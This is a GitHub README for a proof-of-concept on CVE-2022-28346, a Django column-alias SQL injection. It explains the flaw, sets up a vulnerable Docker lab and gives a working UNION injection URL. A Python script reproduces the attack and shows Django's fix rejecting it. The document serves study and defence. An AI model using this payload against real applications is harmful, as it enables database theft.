
kamal-marouane/CVE-2022-28346


CVE-2022-28346

A flaw was found in the Django package, which leads to a SQL injection. This flaw allows an attacker using a crafted dictionary containing malicious SQL queries to compromise the database completely.

Table of Contents

The detailed analysis report (PDF) on CVE-2022-28346 is included in this code repository alongside this README.

Description

CVE-2022-28346 is a critical SQL injection vulnerability in Django, a popular Python web framework. It affects Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4; the fixed releases add a check that rejects unsafe column aliases.

The issue lies in the QuerySet.annotate(), aggregate(), and extra() methods. The keyword names passed to these calls become column aliases in the generated SQL. Django quoted those aliases but did not validate them, so an application that lets untrusted input reach an alias (typically by expanding a crafted dictionary into the **kwargs, e.g. annotate(**{request.GET["field"]: ...})) allowed an attacker to supply an alias containing a closing quotation mark, whitespace, a semicolon, or an SQL comment. Such a value escapes the alias position and the rest of it is spliced verbatim into the query. SQL injection lets an attacker interfere with the queries an application makes to its database: read data they are not normally able to retrieve, including other users' data or anything else the application itself can access, and in some cases modify or delete it, affecting data integrity.

Environment

To conduct a thorough test of this vulnerability, ensure that there is ample free space on your hard disk. A minimum of 1.2 GB is required for the Docker image.

If you already have Docker installed, you can skip this section and proceed directly to the next set of instructions.

To begin testing this vulnerability, install Docker for your platform by following the official Docker installation guide.

Verify that Docker is operational (for example, that docker version succeeds) before moving to the next steps.

In your terminal execute the following command to get the docker image that we have created and pushed to DockerHub :

sudo docker pull marouanekamal/cve-2022-28346:latest


And wait for the Docker image to finish pulling. If you encounter any issues, it may be due to your internet connection; please ensure that you have a stable and active connection.

After the pull ends, verify that the image exists by running the following command :

sudo docker images


You can now run the docker image using the following command :

sudo docker run -p 8000:8000 --name my_cve_container marouanekamal/cve-2022-28346:latest


Now the vulnerable server is listening on port 8000 of the host and we can exploit this CVE ;)

Proof of Concept and Exploitation

After running the docker image, open the following link to check that the application is reachable (0.0.0.0 resolves to the local machine on Linux; use http://127.0.0.1:8000/ if your browser refuses it) :

http://0.0.0.0:8000/


The response body is the word ok, which means that the URL is accessible and everything is working fine!

Now let us attack this vulnerability using SQL injection. The demo view passes the field query parameter as a column alias, so we close the quoted alias, append a UNION that selects the SQLite version, and comment out the rest of Django's query. Type the following URL in your browser in order to do so (the browser percent-encodes the spaces and quotation marks for you; from the command line use curl -G --data-urlencode 'field=...' so that the payload is encoded the same way) :

http://0.0.0.0:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --


The extra row in the response comes from the injected UNION: we managed to determine the version of SQLite used by the server ;)
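The following is an added example, written for this README and not taken from the kamal-marouane/CVE-2022-28346 repository, its Docker image, or Django itself. Using only the Python standard library, it rebuilds the SQL that Django's annotate() emitted before the fix for a user-controlled alias (the demo view is assumed to do User.objects.annotate(**{field: Value("x")}) on a demo_user table with id and name columns; both are assumptions), runs the exact payload from the URL above against an in-memory SQLite table to show the UNION row leaking sqlite_version(), and then applies the alias check (same regular expression and error message) that Django 2.2.28 / 3.2.13 / 4.0.4 added in QuerySet.check_alias().

```python
import re
import sqlite3

# Constructed stand-in for the PoC's "demo_user" table (assumed columns: id, name).
SCHEMA = 'CREATE TABLE "demo_user" ("id" INTEGER PRIMARY KEY, "name" TEXT)'
ROWS = [(1, "alice"), (2, "bob")]

# Value of the ?field= parameter exactly as it appears in the PoC URL above.
PAYLOAD = 'demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --'

# Pattern and message Django added in the fix (django/db/models/query.py, check_alias()).
FORBIDDEN_ALIAS_PATTERN = re.compile(r"['`\"\]\[;\s]|--|/\*|\*/")


def check_alias(alias):
    """The post-fix validation: reject any alias that can break out of quoting."""
    if FORBIDDEN_ALIAS_PATTERN.search(alias):
        raise ValueError(
            "Column aliases cannot contain whitespace characters, quotation marks, "
            "semicolons, or SQL comments."
        )


def alias_rejected(alias):
    """True if the hardened check refuses this alias."""
    try:
        check_alias(alias)
    except ValueError:
        return True
    return False


def quote_name(name):
    # Django's SQLite backend wraps identifiers in double quotes and does not escape
    # quotes inside the name; that is what turns the alias into an injection point.
    return '"%s"' % name


def build_annotate_sql(alias, hardened=False):
    """SQL equivalent of User.objects.annotate(**{alias: Value("x")}) (assumed view).

    With hardened=False this is the pre-fix behaviour: the alias is quoted but not
    validated. With hardened=True the alias is checked first, as fixed Django does.
    """
    if hardened:
        check_alias(alias)
    return 'SELECT "demo_user"."id", "demo_user"."name", ? AS %s FROM "demo_user"' % quote_name(alias)


def run(alias, hardened=False):
    """Execute the generated query against a fresh in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany('INSERT INTO "demo_user" VALUES (?, ?)', ROWS)
    sql = build_annotate_sql(alias, hardened)
    return conn.execute(sql, ("x",)).fetchall()


def leaked_sqlite_version(rows):
    """Return the sqlite_version() string smuggled in by the UNION, or None."""
    for row in rows:
        if row[1] == sqlite3.sqlite_version:
            return row[1]
    return None


if __name__ == "__main__":
    print("generated SQL:", build_annotate_sql(PAYLOAD))
    rows = run(PAYLOAD)
    print("vulnerable result:", rows)
    print("leaked SQLite version:", leaked_sqlite_version(rows))
    print("hardened rejects payload:", alias_rejected(PAYLOAD))
    print("hardened accepts demo_name:", run("demo_name", hardened=True))
```

The generated query shows why the payload works: everything after the attacker's closing quotation mark is parsed as SQL, the UNION must match the three columns of the original SELECT (which is why the payload selects exactly three values), and the trailing `--` comments out Django's own `FROM "demo_user"` and the dangling quote. The same mechanism applies to aggregate() and extra() because they quote aliases through the same path. Note that `"1"` and `"3"` only work as string literals because SQLite accepts double-quoted strings by default; on a build compiled with SQLITE_DQS=0 the attacker would use single quotes instead.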

References


Should you encounter any issues or require clarification on any of the steps, please don't hesitate to reach out via email for assistance :

kamdrain@gmail.com
